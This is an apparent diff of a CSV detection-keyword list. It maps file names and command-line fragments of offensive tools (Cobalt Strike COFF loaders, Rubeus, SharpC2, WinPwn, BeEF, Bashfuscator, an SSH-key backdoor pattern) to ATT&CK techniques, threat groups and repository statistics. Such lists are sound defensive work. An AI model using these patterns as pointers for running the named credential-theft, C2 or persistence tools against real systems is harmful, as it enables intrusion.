TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z" 
@@ -8633,11 +8781,11 @@ "*coffexec *.o *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*COFFLdr.cpp*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" "*COFFLdr.exe*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" -"*COFFLoader.*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","386","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" -"*COFFLoader64.exe*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","386","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" +"*COFFLoader.*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" +"*COFFLoader64.exe*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" "*CognisysGroup/HadesLdr*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" -"*coinomi2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*coldfusion_dir_traversal_exploit*","offensive_tool_keyword","beef","BeEF is short for The Browser 
Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*coinomi2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*coldfusion_dir_traversal_exploit*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*Collection/MiniDumpWriteDump.*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Collection_ArchiveCollectedData_ArchiveViaCustomMethod.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" 
"*Collection_ArchiveCollectedData_ArchiveViaCustomMethod_7z.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" 
@@ -8645,30 +8793,30 @@ "*com_exec_go(*","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","0","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" "*combine_harvester-main*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","1","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*com-exec.cna*","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" -"*COMHunter* -inproc*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*COMHunter* -localserver*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*COMHunter.csproj*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*COMHunter.exe*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and 
InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*COMHunter.sln*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*COMHunter* -inproc*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*COMHunter* -localserver*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*COMHunter.csproj*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*COMHunter.exe*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - 
TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*COMHunter.sln*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*COM-Hunter_v*.zip*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" "*COM-Hunter-main*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" -"*-command *.exe* -technique ccmstp*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*-command *.exe* -technique ccmstp*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" 
"*command_obfuscator.py*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" "*command=*###---POWERSHELL---*eval $(echo *","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","N/A","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","10","9","N/A","N/A","N/A","N/A" "*CommandAndControl_*.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*CommandCam.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*commandovm.*.installer.fireeye*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation 
OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6323","1248","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" -"*commando-vm-master*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6323","1248","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" -"*Commands/Brute.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*Commands/Createnetonly.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*commandovm.*.installer.fireeye*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*commando-vm-master*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*Commands/Brute.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Commands/Createnetonly.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*Commands/DcomCommand.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/DroneCommand.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/ExecuteAssembly.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/KillProcess.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/ListProcesses.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - 
T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*Commands/Logonsession.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Commands/Logonsession.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*Commands/PowerShellImport.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*Commands/Preauthscan.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Commands/Preauthscan.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*Commands/PrintWorkingDirectory.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" 